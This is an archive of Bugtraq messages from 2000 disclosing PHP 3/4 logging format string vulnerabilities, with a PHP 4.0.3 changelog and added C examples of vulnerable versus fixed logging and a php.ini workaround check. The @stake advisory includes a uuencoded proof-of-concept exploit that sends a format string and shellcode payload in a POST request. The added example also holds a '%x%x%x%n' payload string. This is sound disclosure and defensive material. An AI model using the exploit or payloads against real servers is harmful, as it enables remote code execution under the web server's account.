5582370 2000-10-12  07:24  /87 lines/ The mail carrier (which is implemented in) Python
Recipient: Bugtraq (import) <13233>
Subject: PHP remote format string vulnerabilities
------------------------------------------------------------
From: Jouko Pynnönen <jouko@SOLUTIONS.FI>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.10.10010120221430.14548-100000@shell.solutions.fi>

OVERVIEW

PHP is a commonly used HTML-embedded scripting language. Format
string vulnerabilities exist in the error logging routines of PHP
versions 3 and 4, allowing remote users to execute arbitrary code
under the web server's user id. A web server having PHP installed and
one or more PHP scripts is vulnerable to the problem if error logging
is enabled in php.ini. Also any PHP script using the "syslog" command
of PHP may be vulnerable, regardless of error logging.

The problem was tested on a Red Hat Linux system having Apache and
mod_php3 installed. Error logging was enabled in php.ini. With a test
exploit program, a shellcode could be run remotely under the web
server user id, which is typically not the root user.



BUG DETAILS

In main.c, function php3_log_error():

#if HAVE_SYSLOG_H
                if (!strcmp(php3_ini.error_log, "syslog")) {
                        syslog(LOG_NOTICE, log_message);
                        return;
                } else {
#endif
                        log_file = fopen(php3_ini.error_log, "a");
                        if (log_file != NULL) {
                                fprintf(log_file, log_message);
...

This one is a classical "format bug". There are a couple of other
similar fprintf() calls in the same function, as well as Apache API
function calls to aplog_error() and log_error() which all use the
log_message as a format string.

The message can be trivially generated with any php3 script on a web
server, for example by sending a POST request with content-type
"multipart/form-data" but without a boundary string. A shellcode and
other data may be placed in the error message. The error message can
be generated without the script actually wanting to process any POST
data.

Another format bug in functions/syslog.c, function php3_syslog:

        syslog(priority->value.lval, message->value.str.val);

The "syslog" command of PHP takes two parameters, the
priority/facility number and the message itself. The message is
always passed to libc syslog() as a format string. Thus any program
doing syslogging may be vulnerable to a format string attack; details
depend on the script in question.

The code fragments above are taken from PHP 3 sources, but the
vulnerabilities exist in PHP version 4 too.



SOLUTION

Authors of PHP have been contacted (two weeks ago) and they have
released new versions of the software. OS vendors have been contacted
as well and they have, or will release fix packages shortly. A
temporary workaround is to disable error logging in php.ini, and
disable any PHP scripts that use the syslog command.

A new fixed version of PHP 4 is downloadable at

http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz



CREDITS

Vulnerability discovered by: Jouko Pynnönen <jouko@solutions.fi>



--
Jouko Pynnönen          Online Solutions Ltd       Secure your Linux -
jouko@solutions.fi                                 http://www.secmod.com
(5582370) ------------------------------------------(Reflowed)
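The logging sink Jouko quotes above, in its vulnerable and fixed forms, as an added example that is not PHP's code or part of the advisory. The function names are modelled on php3_log_error()/php3_error() but are my own, the timestamp and the Content-Type value are constructed, and the vulnerable function is present only for comparison and is never called:

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Vulnerable shape (modelled on the quoted php3_log_error()): the untrusted
 * message is used as the format string, so %x reads stack words and %n
 * writes memory. Shown for comparison only; nothing below calls it. */
void log_err_vulnerable(FILE *log_file, const char *log_message)
{
    fprintf(log_file, log_message);
    fputc('\n', log_file);
}

/* Fixed shape: a constant format, the message as a plain argument. */
void log_err_fixed(FILE *log_file, const char *log_message)
{
    fprintf(log_file, "%s\n", log_message);
}

/* The same fix for the syslog path used by PHP's syslog() builtin. */
void syslog_fixed(int priority, const char *message)
{
    syslog(priority, "%s", message);
}

/* Builds the log line the way php3_error() does (timestamp plus message),
 * but with every untrusted piece behind a %s. Returns the length the line
 * needs, with snprintf semantics. */
int render_log_line(char *out, size_t out_len,
                    const char *error_time_str, const char *log_message)
{
    return snprintf(out, out_len, "[%s] %s\n", error_time_str, log_message);
}

/* Writes log_message through the fixed sink into a temporary file and reads
 * the resulting line back into out, so the effect can be checked.
 * Returns 0 on success, -1 on I/O failure. */
int fixed_sink_roundtrip(const char *log_message, char *out, size_t out_len)
{
    FILE *f = tmpfile();
    if (!f) return -1;
    log_err_fixed(f, log_message);
    rewind(f);
    if (!fgets(out, (int)out_len, f)) { fclose(f); return -1; }
    fclose(f);
    return 0;
}

/* Review aid: counts conversion directives ('%' not followed by another '%')
 * in a string headed for a logging sink. Any non-zero count on user input is
 * the situation the advisory describes; %n is the write primitive. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }   /* "%%" is a literal percent */
        n++;
    }
    return n;
}

int main(void)
{
    /* Constructed Content-Type value from a malformed POST, as in the text. */
    const char *ctype = "multipart/form-data %x%x%x%n";
    char line[256];
    render_log_line(line, sizeof line, "12-Oct-2000 07:24:00", ctype);
    printf("%s", line);               /* the directives appear literally */
    printf("directives in message: %d\n", count_format_directives(ctype));
    return 0;
}
```

With the fixed sink the directives survive into the log as text, which is what a reviewer wants to see: a grep for `%n` in error logs is then a usable signal that someone is probing the older code path.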

5582432 2000-10-12  08:28  /127 lines/ The mail carrier (which is implemented in) Python
Recipient: Bugtraq (import) <13234>
Subject: PHP security improved -- Fwd: [ANNOUNCE] PHP 4.0.3 released
------------------------------------------------------------
From: Viktors Rotanovs <Viktors@ROTANOVS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <00101200531704.00802@viktors.riga.nu>

----------  Forwarded Message  ----------
Subject: [ANNOUNCE] PHP 4.0.3 released
Date: Thu, 12 Oct 2000 00:42:33 +0200
From: Zeev Suraski <zeev@zend.com>
To: php-general@lists.php.net,
 php-announce@lists.php.net


PHP 4.0.3 has been released.  4.0.3 is mostly a security-oriented
maintenance release, therefore it's *strongly* recommended for all
users of PHP to upgrade to it.

Source:
http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz

Win32 binaries:
http://www.php.net/do_download.php?download_file=php-4.0.3-Win32.zip
You'd notice that the 4.0.3 Win32 distribution is beefed up with a
lot of loadable modules.  The extensive build is courtesy of Daniel
Beulshausen - thanks!

The full list of changes is enclosed.

Zeev


11 Oct 2000, Version 4.0.3
- Fixed a possible crash in -a interactive mode (Zeev, Zend Engine)
- Added mysql_escape_string() (Peter A. Savitch & Brian Wang)
- Fixed many possible crash bugs with improper use of the printf() family of
   functions (Andi)
- Fixed a problem that allowed users to override admin_value's and
   admin_flag's (Zeev)
- Fixed PostgreSQL module to work when the link handle is omitted (Zeev)
- Fixed returning of empty LOB fields in OCI8. (Thies)
- Added Calendar module to default Win32 build (Andi)
- Added FTP module to default Win32 build (Andi)
- Fixed crash in the POSIX getrlimit() function (alex@zend.com)
- Fixed dirname() under certain conditions (Andi)
- Added --with-imap-ssl to support SSL'ized imap library in RH7 and others
   (Rasmus)
- Fixed possible crash bug in parse_url() (Andi)
- Added support for trans sid under Win32 (Daniel)
- IPv6 support in fopen (Stig Venaas)
- Added the shmop extension. It allows more general ways of shared memory
   access. (thanks to Ilia Alshanestky <iliaa@home.com> and Slava Poliakov
   <slavapl@mailandnews.com>) (Derick)
- Added the ability for CURLOPT_POSTFIELDS to accept an associative array of
   HTTP POST variables and values. (Sterling)
- Added the CURLOPT_HTTPHEADER option to curl_setopt(). (Sterling)
- Added the curl_error() and curl_errno() functions. (Sterling)
- Changed ext/db not to be enabled by default (Jani)
- Fixed building Apache SAPI module on SCO UnixWare (Sascha)
- Fixed writing empty session sets to shared memory (tcarroll@chc-chimes.com)
- Added support for BSD/OS make (Sascha)
- Added improved URL rewriter (Sascha)
- Fixed readdir_r() use on Solaris (Sascha)
- Improved HTTP headers for private-caching (jon@csh.rit.edu, Sascha)
- Added new function session_cache_limiter (jon@csh.rit.edu, Sascha)
- Added ftp_exec to the ftp functions (thanks to <jhennebicq@i-d.net>)
   (Derick)
- PEAR: add last executed query as debug info in DB errors (Stig)
- PEAR: allow multiple modes in PEAR_Error (Stig)
- Made the Sybase CT module thread safe (Zeev)
- Added second argument to array_reverse() that indicates whether
   the original array keys should be preserved. (Andrei)
- Clean up htmlspecialchars/htmlentities inconsistencies. (Rasmus)
- PEAR: renamed DB_GETMODE_* to DB_FETCHMODE_*, added setFetchMode()
   in DB_common to set the default mode, added some MySQL tests (Stig)
- Made eval() and several other runtime-evaluated code portions report the
   nature and location of errors more accurately (Stas)
- Added an optional parameter to wordwrap that cuts a string if the length of
   a word is longer than the maximum allowed. (Derick)
- Added functions pg_put_line and pg_end_copy (Dirk Elmendorf)
- Added second parameter for parse_str to save result (John Bafford)
- Fixed bug with curl places extra data in the output. (medvitz@medvitz.net)
- Added the pathinfo() function. (Sterling)
- Updated sybase_ct module and its sybase_query to use high performance API.
   (Joey)
- Added a more configurable error reporting interface to DB. (Stig)
- Added is_uploaded_file() and move_uploaded_file() (Zeev)
- Added several directives to php.ini - post_max_size, file_uploads,
   display_startup_errors - see php.ini-dist for further information (Zeev)
- Worked around a bug in the libc5 implementation of readdir() (Stas)
- Fixed some potential OpenBSD and NetBSD crash bugs when opening files.
   (Andi)
- Added EscapeShellArg() function (Rasmus)
- Added a php.ini option session.use_trans_sid to enable/disable trans-sid.
   (Sterling)
- Added the Sablotron extension for XSL parsing. (Sterling)
- Fixed a bug in checkdate() which caused < 1 years to be valid (Jani)
- Added support for an optional output handler function for output
   buffering.  This enables transparent rendering of XML through XSL,
   transparent compression, etc. (Zeev)
- Added support for user defined 'tick' callback functions. This helps
   emulate background processing. (Andrei)
- Fixed problem with having $this as the XML parser object. (Andrei)
- Internal opened_path variable now uses the Zend memory manager so that full
   paths of files won't leak on unclean shutdown (Andi)
- Removed support of print $obj automatically calling the __string_value()
   method. Instead define yourself a method such as toString() and use
   print $obj->toString() (Andi, Zend Engine)


--
Zeev Suraski   <zeev@zend.com>
http://www.zend.com/


-- PHP Announcements Mailing List (http://www.php.net/) To
unsubscribe, e-mail: php-announce-unsubscribe@lists.php.net For
additional commands, e-mail: php-announce-help@lists.php.net To
contact the list administrators, e-mail: php-list-admin@lists.php.net

-------------------------------------------------------

--
Best Wishes,
Viktors Rotanovs
I create websites that attract more clients. http://riga.nu/
Riga Latvia +371, Phone/Fax 7377-472, GSM 9173-000
(5582432) ------------------------------------------(Reflowed)

5587155 2000-10-12  21:13  /353 lines/ The mail carrier (which is implemented in) Python
Recipient: Bugtraq (import) <13244>
Subject: @stake Advisory: PHP3/PHP4 Logging Format String Vulnerability (A101200-1)
------------------------------------------------------------
From: "@stake Advisories" <advisories@ATSTAKE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <C5119AD12E92D311928E009027DE4CCA5548F9@boddington.atstake.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



We contacted the PHP team on 10/3/2000 concerning this problem. We wanted
to hold off releasing our advisory until a fix was available for PHP3
since some users may not be able to easily upgrade to PHP4.  Fixes for
PHP3 and PHP4 are now available. We are aware that Jouko Pynnönen
<jouko@solutions.fi> found this problem independently but chose to release
before the PHP3 fix was available.

Weld Pond


                          @stake, Inc.
                        www.atstake.com   

                       Security Advisory

Advisory Name: PHP3/PHP4 Logging Format String Vulnerability
 Release Date: 10/12/2000
  Application: PHP3 and PHP4
     Platform: All platforms
     Severity: Attacker can remotely compromise PHP3 enabled webservers,
               and most likely PHP4 enabled webservers
       Author: DilDog [dildog@atstake.com]
Vendor Status: Fix for PHP3 and PHP4 available
          Web: www.atstake.com/research/advisories/2000/a101200-1.txt

Executive Summary

	PHP versions 3 and 4 are vulnerable to format string attacks
in their logging functions. This can lead to remote takeover of PHP
enabled webservers that have logging enabled.


Overview

	PHP versions 3 and 4 employ a set of logging functions that,
through an improper use of 'syslog()' and 'vsnprintf()', render it
vulnerable to attack. The attacker could utilize this vulnerability
to remotely compromise any PHP enabled webserver that has logging to
either syslog or to a file enabled in the 'php.ini' configuration
file. This particular attack does not affect PHP installations that
do not log PHP errors and warnings.



Detailed Description

PHP versions 3 and 4 utilize the following functions:


main/php_syslog.h:

#define php_syslog syslog


main/main.c:

void php_log_err(char *log_message)
{
	...
	php_syslog(LOG_NOTICE, log_message);
	...

	fprintf(log_file, "[%s] ", error_time_str);
	fprintf(log_file, log_message);
	fprintf(log_file, "\n");
	...
}




	Hence, if the "log_message" contains any user input at all,
then it creates a vulnerability. An exploitable condition is
presented in the following code for PHP 3, since 'php3_error' calls
down to php_log_err if logging is enabled:


main/main.c:

PHPAPI void php3_error(int type, const char *format,...) {
	...
	char log_buffer[1024];
	snprintf(log_buffer, 1024, "PHP 3 %s:  %s in %s on line %d",
		error_type_str, buffer, filename,
		php3_get_lineno(GLOBAL(current_lineno)));

	php3_log_err(log_buffer);
	...
}


functions/post.c:

static char *php3_getpost(pval *http_post_vars)
{
	...
	php3_error(E_WARNING, "File Upload Error: No MIME boundary found");
	php3_error(E_WARNING, "There should have been a \"boundary=something\" in the Content-Type string");
	php3_error(E_WARNING, "The Content-Type string was: \"%s\"", ctype);
	...
}

	PHP4 looks vulnerable as well, but in a different place. When
a file is uploaded via a post operation, if the file name contains
format string exploit code, and the file size is larger than the
maximum file size for uploads, the following code is executed. Note
that this possible problem has not been tested by @stake, but the
code path looks problematic:

static void php_mime_split(char *buf, int cnt, char *boundary, zval *array_ptr)
{
	...
	php_error(E_WARNING, "Max file size exceeded - file [%s] not saved", namebuf);
	...
}



Temporary Solution

Turn off logging on PHP3 and PHP4 by going into your 'php.ini'
file and changing the following settings to:

log_errors = Off



Vendor Response

A fixed version of PHP4 is available:
http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz   

A fixed version of PHP3 is available:
http://www.php.net/distributions/php-3.0.17.tar.gz


Proof-of-Concept Code


	This proof of concept code creates a zero length file in
/tmp/BADPHP. Use like this:

gcc badphp.c && ./a.out <ip address of webserver> <port of webserver> <php file path>

(php file path must point to an existing php file, such as /foo.php3)

begin 644 badphp.c

M(VEN8VQU9&4\<W1D:6\N:#X*(VEN8VQU9&4\<WES+W1Y<&5S+F@^"B-I;F-L

M=61E/'-Y<R]S;V-K970N:#X*(VEN8VQU9&4\;F5T:6YE="]I;BYH/@HC:6YC

M;'5D93QA<G!A+VEN970N:#X*(VEN8VQU9&4\;F5T9&(N:#X*"B-D969I;F4@

M0E-)6D4@,34T.0HC9&5F:6YE($)51D9%4EI/3D4@,3(X"@II;G0@;6%I;BAI

M;G0@87)G8RP@8VAA<B`J87)G=EM=*0I["B`@:6YT(&DL<W1A<G0L8V]U;G0[

M"B`@:6YT('-T86-K;&]C/3!X0D9&1D1!-C`["B`@:6YT(',["B`@1DE,12`J

M9CL*("!F9%]S970@<F9D<SL*("!S=')U8W0@:&]S=&5N="`J:&4["B`@<W1R

M=6-T('-O8VMA9&1R7VEN('-A9&1R.PH@(&-H87(@<W!L;VET6T)325I%73L*

M("!C:&%R(&9I;&5;73TB+W1M<"]"04102%`B.PH@(&-H87(@8SL*"B`@:68H

M87)G8R$]-2D@>PH@("`@<')I;G1F*"(E<R`\861D<CX@/'!O<G0^(#QO9F9S

M970^(#QP:'`@9FEL92!N86UE/EQN(BQA<F=V6S!=*3L*("`@('!R:6YT9B@B

M;V9F<V5T/3`@9F]R(&UO<W0@<WES=&5M<RY<;B(I.R`*("`@(')E='5R;B`P

M.PH@('T*"B`@+RHJ*B!B=6EL9"!E>'!L;VET('-T<FEN9R`J*BHO"B`@"B`@

M+RH@=W)I=&4@8F%D(&9O<FUA="!S=')I;F<L(&%D9&EN9R!I;B!O9F9S970@

M*B\*("!S;G!R:6YT9BAS<&QO:70L<VEZ96]F*'-P;&]I="DL"@D@("`B0V]N

M=&5N="U4>7!E.FUU;'1I<&%R="]F;W)M+61A=&$@)24E=5@E)5@E)5@E)6AN

M(BP*"2`@(#4U.#$W("\J*V]F9G-E=#`L,2PR+#,J+R`I.PH*("`O*B!F:6QL

M('=I=&@@8G)E86MP;VEN=',@86YD(&YO<',J+PH@('-T87)T/7-T<FQE;BAS

M<&QO:70I.PH@(&UE;7-E="AS<&QO:70K<W1A<G0L,'A#0RQ"4TE:12US=&%R

M="D["B`@;65M<V5T*'-P;&]I="MS=&%R="M"549&15):3TY%*C0L,'@Y,"Q"

M549&15):3TY%*C0I.PH@('-P;&]I=%M"4TE:12TQ73TP.PH@(`H@("\J('!O

M:6YT97(@=&\@<W1A<G0@;V8@8V]D92`H<W1A8VML;V,K-"D@*B\*("!C;W5N

M=#U"549&15):3TY%.PH@(&9O<BAI/3`[:3QC;W5N=#MI*RLI('L*("`@('5N

M<VEG;F5D(&EN="!V86QU93US=&%C:VQO8RLT*RAC;W5N="HT*3L*("`@(&EF

M*"AV86QU928P>#`P,#`P,$9&*3T],"D@=F%L=65\/3!X,#`P,#`P,#0["B`@

M("!I9B@H=F%L=64F,'@P,#`P1D8P,"D]/3`I('9A;'5E?#TP>#`P,#`P-#`P

M.PH@("`@:68H*'9A;'5E)C!X,#!&1C`P,#`I/3TP*2!V86QU97P],'@P,#`T

M,#`P,#L*("`@(&EF*"AV86QU928P>$9&,#`P,#`P*3T],"D@=F%L=65\/3!X

M,#0P,#`P,#`["B`@("`J*'5N<VEG;F5D(&EN="`J*28H<W!L;VET6W-T87)T

M*VDJ-%TI/79A;'5E.PH@('T*("!S=&%R="L]0E5&1D526D].12HT*C(["@H@
M("\J*BH@8G5I;&0@<VAE;&QC;V1E("HJ*B\*"B`@<W!L;VET6W-T87)T*S!=

M/3!X.3`[("\J(&YO<"`J+PH@(`H@('-P;&]I=%MS=&%R="LQ73TP>$)!.R`O

M*B!M;W8@961X+"`H;F]T(#!X,4(V("AA*W)W*2D@*B\*("!S<&QO:71;<W1A

M<G0K,ET],'@T.3L*("!S<&QO:71;<W1A<G0K,UT],'A&13L*("!S<&QO:71;

M<W1A<G0K-%T],'A&1CL*("!S<&QO:71;<W1A<G0K-5T],'A&1CL*"B`@<W!L

M;VET6W-T87)T*S9=/3!X1C<[("\J(&YO="!E9'@@*B\*("!S<&QO:71;<W1A

M<G0K-UT],'A$,CL*"B`@<W!L;VET6W-T87)T*SA=/3!X0CD[("\J(&UO=B!E

M8W@L("AN;W0@,'@T,"`H3U]#4D5!5"DI("HO"B`@<W!L;VET6W-T87)T*SE=

M/3!X0D8["B`@<W!L;VET6W-T87)T*S$P73TP>$9&.PH@('-P;&]I=%MS=&%R

M="LQ,5T],'A&1CL*("!S<&QO:71;<W1A<G0K,3)=/3!X1D8["B`@"B`@<W!L

M;VET6W-T87)T*S$S73TP>$8W.R`O*B!N;W0@96-X("HO"B`@<W!L;VET6W-T

M87)T*S$T73TP>$0Q.PH@(`H@('-P;&]I=%MS=&%R="LQ-5T],'A%.#L@+RH@

M8V%L;"!E:7`K-"`K(&EN8R!E87@@*&]V97)L87!P:6YG*2`J+PH@('-P;&]I

M=%MS=&%R="LQ-ET],'A&1CL@"B`@<W!L;VET6W-T87)T*S$W73TP>$9&.R`*

M("!S<&QO:71;<W1A<G0K,3A=/3!X1D8[(`H@('-P;&]I=%MS=&%R="LQ.5T]

M,'A&1CL@"B`@<W!L;VET6W-T87)T*S(P73TP>$,P.PH@('-P;&]I=%MS=&%R

M="LR,5T],'@U0CL@+RH@<&]P(&5B>"`J+PH@('-P;&]I=%MS=&%R="LR,ET]

M,'@V03L@+RH@<'5S:"`R,B`H;V9F<V5T('1O(&5N9"!O9B!S<&QO:70@*&9I

M;&5N86UE*2D@*B\*("!S<&QO:71;<W1A<G0K,C-=/3!X,38["B`@<W!L;VET

M6W-T87)T*S(T73TP>#4X.R`O*B!P;W`@96%X("HO"B`@<W!L;VET6W-T87)T

M*S(U73TP>#`S.R`O*B!A9&0@96)X+&5A>"`J+PH@('-P;&]I=%MS=&%R="LR

M-ET],'A$.#L*("`*("!S<&QO:71;<W1A<G0K,C==/3!X,S,[("\J('AO<B!E

M87@L96%X("HO"B`@<W!L;VET6W-T87)T*S(X73TP>$,P.PH*("!S<&QO:71;

M<W1A<G0K,CE=/3!X.#@[("\J(&UO=B!B>71E('!T<B!;96)X*S$Q72QA;"`J

M+PH@('-P;&]I=%MS=&%R="LS,%T],'@T,SL*("!S<&QO:71;<W1A<G0K,S%=

M/3!X,$(["B`*("!S<&QO:71;<W1A<G0K,S)=/3!X.#,[("\J(&%D9"!E87@L

M-2`J+PH@('-P;&]I=%MS=&%R="LS,UT],'A#,#L*("!S<&QO:71;<W1A<G0K

M,S1=/3!X,#4["@H@('-P;&]I=%MS=&%R="LS-5T],'A#1#L@+RH@:6YT(#@P

M("AO<&5N*2`J+PH@('-P;&]I=%MS=&%R="LS-ET],'@X,#L*"B`@<W!L;VET

M6W-T87)T*S,W73TP>#,S.R`O*B!X;W(@96%X+&5A>"`J+PH@('-P;&]I=%MS

M=&%R="LS.%T],'A#,#L*(`H@('-P;&]I=%MS=&%R="LS.5T],'@T,#L@+RH@

M:6YC(&5A>"`J+PH@(`H@('-P;&]I=%MS=&%R="LT,%T],'A#1#L@+RH@:6YT

M(#@P("A?97AI="D@*B\*("!S<&QO:71;<W1A<G0K-#%=/3!X.#`["B`@"B`@

M+RH@861D(&9I;&5N86UE('1O('1O=6-H("HO"B`@<W1R;F-P>2@F<W!L;VET

M6W-T87)T*S0R72QF:6QE+'-T<FQE;BAF:6QE*2D["@H@("\J*BH@<V5N9"!E

M>'!L;VET('-T<FEN9R`J*BHO"B`*("`O*B!C<F5A=&4@<V]C:V5T("HO"B`@

M<SUS;V-K970H4$9?24Y%5"Q33T-+7U-44D5!32Q)4%!23U1/7U1#4"D["B`@ 
M:68H<SPP*2!["B`@("!P<FEN=&8H(F-O=6QD;B=T(&-R96%T92!S;V-K970N

M7&XB*3L*("`@(')E='5R;B`P.PH@('T@"B`*("`O*B!C;VYN96-T('1O('!O

M<G0@*B\*("!M96US970H)G-A9&1R+#`L<VEZ96]F*'-A9&1R*2D["B`@<V%D

M9'(N<VEN7V9A;6EL>3U!1E])3D54.PH@('-A9&1R+G-I;E]P;W)T/6AT;VYS

M*&%T;VDH87)G=ELR72DI.PH@(&AE/6=E=&AO<W1B>6YA;64H87)G=ELQ72D[

M"B`@:68H:&4]/4Y53$PI('L*("`@('!R:6YT9B@B:6YV86QI9"!H;W-T;F%M

M92Y<;B(I.PH@('T*("!M96UC<'DH)BAS861D<BYS:6Y?861D<BYS7V%D9'(I

M+&AE+3YH7V%D9')?;&ES=%LP72QS:7IE;V8H<W1R=6-T(&EN7V%D9'(I*3L*

M"B`@:68H8V]N;F5C="AS+"AS=')U8W0@<V]C:V%D9'(@*BDF<V%D9'(L<VEZ

M96]F*'-A9&1R*2DA/3`I('L*("`@('!R:6YT9B@B8V]U;&1N)W0@8V]N;F5C

M="Y<;B(I.PH@("`@<F5T=7)N(#`["B`@?0H@(`H@("\J(&9D;W!E;B!T:&4@

M<V]C:V5T('1O('5S92!S=')E86T@9G5N8W1I;VYS("HO"B`@9CUF9&]P96XH

M<RPB=R(I.PH@(&EF*&8]/4Y53$PI('L*("`@(&-L;W-E*',I.PH@("`@<')I

M;G1F*")C;W5L9&XG="!F9&]P96X@<V]C:V5T+EQN(BD["B`@("!R971U<FX@

M,#L*("!]"@H@("\J('!U="!T:&4@<&]S="!R97%U97-T('1O('1H92!S;V-K

M970@*B\*("!F<')I;G1F*&8L(E!/4U0@)7,@2%144"\Q+C!<;B(L87)G=ELT

M72D["B`@9G!U=',H<W!L;VET+&8I.PH@(&9P=71C*"=<;B<L9BD["B`@9G!U

M=&,H)UQN)RQF*3L*("!F9FQU<V@H9BD["@H@("\J(&-L;W-E('1H92!S;V-K

M970@*B\*("!F8VQO<V4H9BD["B`@8VQO<V4H<RD["@H@(')E='5R;B`P.PI]

("@H*"@H*"@H`

`

end        

For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0

iQA/AwUBOeXDs1ESXwDtLdMhEQKhfQCg9vH3t5G8VsJfm87jcfFd1+wUwSUAoPK0
Nuo1xrPafrB4/ktOyIvMJzzf
=URKs
-----END PGP SIGNATURE-----
(5587155) ------------------------------------------(Reflowed)
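The temporary workaround both advisories give is a php.ini setting, so an administrator who cannot upgrade immediately needs a way to confirm it is really in effect. Below is an added example, not code from PHP or from @stake, that reads php.ini-style text and reports the effective value of `log_errors` (last assignment wins, comments and quoted values handled) and, since Jouko's message notes that the syslog and file paths are both affected, exposes the raw `error_log` value too. The sample ini text is constructed; if `log_errors` is absent the function reports it as unset rather than guessing the built-in default, which must then be checked against the installed version:

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { INI_OFF = 0, INI_ON = 1, INI_UNSET = -1 };

/* Case-insensitive comparison of a length-delimited key against a C string. */
static int ci_equal(const char *a, size_t alen, const char *b)
{
    if (strlen(b) != alen) return 0;
    for (size_t i = 0; i < alen; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Copies the effective value of `key` into out (later assignments override
 * earlier ones, as PHP does). Lines starting with ';' or '#', section headers
 * and blank lines are skipped; a trailing "; comment" is stripped from
 * unquoted values; quoted values keep their contents verbatim.
 * Returns 1 if the key was found, 0 otherwise. */
int ini_value(const char *ini_text, const char *key, char *out, size_t out_len)
{
    int found = 0;
    const char *line = ini_text;
    while (*line) {
        const char *eol = strchr(line, '\n');
        const char *end = eol ? eol : line + strlen(line);
        const char *p = line;
        while (p < end && (*p == ' ' || *p == '\t')) p++;
        if (p < end && *p != ';' && *p != '#' && *p != '[') {
            const char *eq = memchr(p, '=', (size_t)(end - p));
            if (eq) {
                const char *kend = eq;
                while (kend > p && (kend[-1] == ' ' || kend[-1] == '\t')) kend--;
                if (ci_equal(p, (size_t)(kend - p), key)) {
                    const char *v = eq + 1;
                    while (v < end && (*v == ' ' || *v == '\t')) v++;
                    const char *vend;
                    if (v < end && *v == '"') {          /* quoted value */
                        v++;
                        vend = v;
                        while (vend < end && *vend != '"') vend++;
                    } else {                             /* unquoted value */
                        vend = v;
                        while (vend < end && *vend != ';') vend++;
                        while (vend > v && (vend[-1] == ' ' || vend[-1] == '\t' ||
                                            vend[-1] == '\r')) vend--;
                    }
                    size_t n = (size_t)(vend - v);
                    if (n >= out_len) n = out_len - 1;
                    memcpy(out, v, n);
                    out[n] = '\0';
                    found = 1;
                }
            }
        }
        line = eol ? eol + 1 : end;
    }
    return found;
}

/* Interprets a boolean ini directive the way PHP does: on/yes/true/1 (and
 * any non-zero number) are true, everything else (off/no/false/0/"") false. */
int ini_bool(const char *ini_text, const char *key)
{
    char v[64];
    if (!ini_value(ini_text, key, v, sizeof v)) return INI_UNSET;
    size_t n = strlen(v);
    if (ci_equal(v, n, "on") || ci_equal(v, n, "yes") || ci_equal(v, n, "true"))
        return INI_ON;
    return atoi(v) != 0 ? INI_ON : INI_OFF;
}

/* 1 when the advisory's workaround ("log_errors = Off") is in effect. */
int workaround_applied(const char *ini_text)
{
    return ini_bool(ini_text, "log_errors") == INI_OFF;
}

int main(void)
{
    /* Constructed php.ini excerpt: an early "On" overridden by a later "Off". */
    const char *ini =
        "; constructed php.ini\n[PHP]\nlog_errors = On ; default\n"
        "error_log = syslog\n\nLOG_ERRORS = \"Off\"\n";
    char sink[64];
    printf("log_errors workaround applied: %d\n", workaround_applied(ini));
    if (ini_value(ini, "error_log", sink, sizeof sink))
        printf("error_log sink: %s\n", sink);
    return 0;
}
```

Run it against the real php.ini of each affected host (`php -i` or the web server's configured path tells you which file is loaded); a result of unset means the built-in default decides and the host should be treated as exposed until the fixed release is installed.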